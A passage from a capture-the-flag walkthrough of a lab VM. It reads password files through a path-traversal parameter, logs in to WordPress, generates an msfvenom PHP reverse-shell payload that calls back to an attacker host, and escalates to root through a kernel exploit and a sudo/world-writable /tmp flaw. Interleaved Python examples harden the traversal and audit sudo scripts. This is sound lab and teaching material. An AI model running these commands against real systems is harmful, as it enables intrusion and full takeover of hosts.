[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),999(guest-uw1hdg)
#
The intended route
- The goal is the password.txt file in saket's home directory. Try http://192.168.116.132/image.php?secrettier360=/home/saket/password.txt; the password is: follow_the_ippsec
➜ ~ curl http://192.168.116.132/image.php?secrettier360=/home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>
➜ ~
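The two reads through image.php (/etc/passwd above, /home/saket/password.txt here) come down to one defect: the parameter value is used as a path unchanged. The page never shows image.php's source, so the "vulnerable" side below only models the behaviour observed in the responses; the hardened resolver is an added example, not the project's code, and the web root, placeholder image and symlink are constructed in temporary directories.

```python
import os
import tempfile

IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# Constructed stand-in for the site's web root and for a directory outside it.
WEB_ROOT = tempfile.mkdtemp(prefix="hnp_webroot_")
OUTSIDE = tempfile.mkdtemp(prefix="hnp_outside_")
with open(os.path.join(WEB_ROOT, "hacknpentest.png"), "wb") as fh:
    fh.write(b"\x89PNG\r\n\x1a\n")  # placeholder bytes, not a real image
with open(os.path.join(OUTSIDE, "secret.txt"), "w", encoding="utf-8") as fh:
    fh.write("not for the web server\n")
try:
    # A symlink inside the web root that points outside it: name-based checks alone miss this.
    os.symlink(os.path.join(OUTSIDE, "secret.txt"), os.path.join(WEB_ROOT, "link.png"))
except OSError:
    pass  # symlinks unavailable on this platform; the containment check is still exercised


def vulnerable_resolve(param: str) -> str:
    """Models the observed behaviour: whatever the request supplies is the path that
    gets read, so /etc/passwd or /home/saket/password.txt is served verbatim."""
    return param


def hardened_resolve(param: str, base_dir: str = WEB_ROOT):
    """Return the real path to serve, or None when the request must be refused."""
    # 1. Only a bare file name is acceptable: no separators, no NUL, no leading dot.
    if not param or "/" in param or "\\" in param or "\x00" in param or param.startswith("."):
        return None
    # 2. Only the file types this endpoint exists to serve.
    if os.path.splitext(param)[1].lower() not in IMAGE_EXTENSIONS:
        return None
    # 3. Resolve symlinks and confirm the final target is still inside the web root.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, param))
    if os.path.commonpath([base, target]) != base:
        return None
    # 4. Serve regular files only.
    if not os.path.isfile(target):
        return None
    return target


if __name__ == "__main__":
    for value in ["hacknpentest.png", "/etc/passwd", "../../etc/passwd",
                  "/home/saket/password.txt", "link.png"]:
        print(f"{value!r:30} vulnerable -> {vulnerable_resolve(value)!r:30} "
              f"hardened -> {hardened_resolve(value)!r}")
```

Step 3 is what catches the symlink case: the name "link.png" passes every string check, but its real path lies outside the web root.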
- Look for the author's username in the WordPress posts. There is only one post and its author is victor. Log in with that username and the password. This is why a WordPress author should set a display name, so the login username cannot be guessed by others.
- Log in to the admin panel and upload a webshell; no need to go into that, there are all sorts of ways, such as editing the theme.
➜ ~ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.116.1 LPORT=7788 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30656 bytes
Saved as: shell.php
msf5 > use exploit/m
Display all 313 possibilities? (y or n)
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set lport 7788
lport => 7788
msf5 exploit(multi/handler) > set lhost 192.168.116.1
lhost => 192.168.116.1
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.116.1:7788
[*] Meterpreter session 1 opened (192.168.116.1:7788 -> 192.168.116.132:43802) at 2019-09-20 11:31:27 +0800
- Interactive terminal: python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/home/saket$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/home/saket$
- Privilege escalation with CVE-2017-16995: https://github.com/SecWiki/linux-kernel-exploits/tree/master/2017/CVE-2017-16995
- Upload it to the server, compile it with gcc and run it to get root.
- Or use the module that ships with msf:
msf5 exploit(multi/handler) > use exploit/linux/local/bpf_sign_extension_priv_esc
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set lhost 192.168.116.1
lhost => 192.168.116.1
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Writing '/tmp/.Glz23KY6oY.c' (10867 bytes) ...
[*] Writing '/tmp/.UaPN30M' (207 bytes) ...
[*] Launching exploit ...
[*] Sending stage (985320 bytes) to 192.168.116.132
[*] Meterpreter session 2 opened (192.168.116.1:4444 -> 192.168.116.132:48326) at 2019-09-20 12:40:28 +0800
meterpreter > sysinfo
Computer : 192.168.116.132
OS : Ubuntu 16.04 (Linux 4.10.0-28-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > shell
Process 2362 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Privilege escalation without an exploit
There is actually an executable named enc in saket's directory. Run it and enter the backup_password found above; it copies two files into saket's home directory, yielding enc.txt and key.txt.
www-data@ubuntu:/home/saket$ ./enc
./enc
enter password: backup_password
backup_password
good
/bin/cp: cannot stat '/root/enc.txt': Permission denied
/bin/cp: cannot stat '/root/key.txt': Permission denied
www-data@ubuntu:/home/saket$ whoami
whoami
www-data
www-data@ubuntu:/home/saket$ sudo ./enc
sudo ./enc
enter password: backup_password
backup_password
good
www-data@ubuntu:/home/saket$ ls
ls
enc enc.txt key.txt password.txt user.txt
www-data@ubuntu:/home/saket$
- After decrypting and then base64-decoding, saket's password is tribute_to_ippsec
➜ ~ echo "RG9udCB3b3JyeSBzYWtldCBvbmUgZGF5IHdlIHdpbGwgcmVhY2ggdG8Kb3VyIGRlc3RpbmF0aW9uIHZlcnkgc29vbi4gQW5kIGlmIHlvdSBmb3JnZXQgCnlvdXIgdXNlcm5hbWUgdGhlbiB1c2UgeW91ciBvbGQgcGFzc3dvcmQKPT0+ICJ0cmlidXRlX3RvX2lwcHNlYyIKClZpY3Rvciw="|base64 -d
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,%
- Switch to the saket user
www-data@ubuntu:/home/saket$ su saket
su saket
Password: tribute_to_ippsec
saket@ubuntu:~$
saket@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$
- /home/victor/undefeated_victor can be run with sudo without a password.
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:~$
- The file /tmp/challenge does not exist; copy bash to /tmp/challenge and you get command execution with victor's privileges.
saket@ubuntu:~$ pwd
pwd
/home/saket
saket@ubuntu:~$ cp /bin/bash /tmp/challenge
cp /bin/bash /tmp/challenge
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
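The root cause of that last step is a sudo NOPASSWD target that calls a path in a world-writable directory before anything exists there. The audit below is an added example, not part of the write-up: it builds a constructed copy of the undefeated_victor script in a temporary directory (the world-writable "dropzone" plays the role of /tmp), extracts the absolute paths the script runs, and reports the conditions that let a non-root user choose what root executes.

```python
import os
import re
import stat
import tempfile

# Absolute paths in the script body, e.g. "/tmp/challenge"; the shebang is skipped as a comment.
ABS_PATH = re.compile(r"(?<![\w./-])/[\w./-]+")


def check_target(path):
    """Findings for one path that a root-run script references."""
    findings = []
    parent = os.path.dirname(path) or "/"
    try:
        parent_st = os.stat(parent)
    except FileNotFoundError:
        return [(path, "parent directory does not exist")]
    if parent_st.st_mode & stat.S_IWOTH:
        findings.append((path, "parent directory is world-writable"))
    if not os.path.lexists(path):
        findings.append((path, "target does not exist; whoever creates it first chooses what root runs"))
        return findings
    st = os.stat(path)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((path, "target is writable by group or others"))
    if st.st_uid != 0:
        findings.append((path, f"target owned by uid {st.st_uid}, not root"))
    return findings


def audit_sudo_script(script_path):
    """Return (path, reason) findings for every absolute path a sudo-run script invokes."""
    findings = []
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            code = line.split("#", 1)[0]  # drop comments (and the shebang)
            for path in ABS_PATH.findall(code):
                if path != script_path:
                    findings.extend(check_target(path))
    return findings


def build_sample():
    """Constructed stand-in for the walkthrough's sudo target: a script that calls a
    binary which does not exist yet, inside a directory anyone can write to."""
    root = tempfile.mkdtemp(prefix="sudo_audit_")
    dropzone = os.path.join(root, "dropzone")
    os.mkdir(dropzone)
    os.chmod(dropzone, 0o1777)  # same mode as /tmp
    script = os.path.join(root, "undefeated_victor")
    with open(script, "w", encoding="utf-8") as fh:
        fh.write('#!/bin/sh\n'
                 'echo "if you can defeat me then challenge me in front of you"\n'
                 f'{dropzone}/challenge\n')
    os.chmod(script, 0o755)
    return script, os.path.join(dropzone, "challenge")


if __name__ == "__main__":
    script, _ = build_sample()
    for path, reason in audit_sudo_script(script):
        print(f"{path}: {reason}")
```

The fix on the defender's side follows from the findings: a sudo target must only invoke root-owned, non-writable files in root-owned directories, and the rule itself should name a binary rather than a script that dispatches to other paths.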